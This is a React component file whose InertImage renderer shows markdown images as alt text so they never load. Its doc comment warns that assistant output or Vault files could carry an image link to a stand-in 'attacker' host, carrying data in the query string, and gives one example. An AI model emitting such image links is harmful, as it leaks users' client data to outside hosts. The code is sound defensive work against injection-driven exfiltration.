import type { ComponentPropsWithoutRef } from 'react';
import type { ExtraProps } from 'react-markdown';

/**
 * Renders a markdown image as its alt text and never loads it.
 *
 * Markdown here comes from the assistant (which reads client data and, later,
 * mail) and from files in the Vault. An image is a request the reader's browser
 * makes on sight, so `![](https://attacker/?q=<data>)` in either one would send
 * whatever the text put in the URL to that host. Links still need a click;
 * images must not fire at all. Covers inline and reference images alike —
 * both reach the renderer as `img`.
 */
export function InertImage({ alt }: ComponentPropsWithoutRef<'img'> & ExtraProps) {
  if (!alt) return null;
  return <span className="text-muted-foreground">[{alt}]</span>;
}
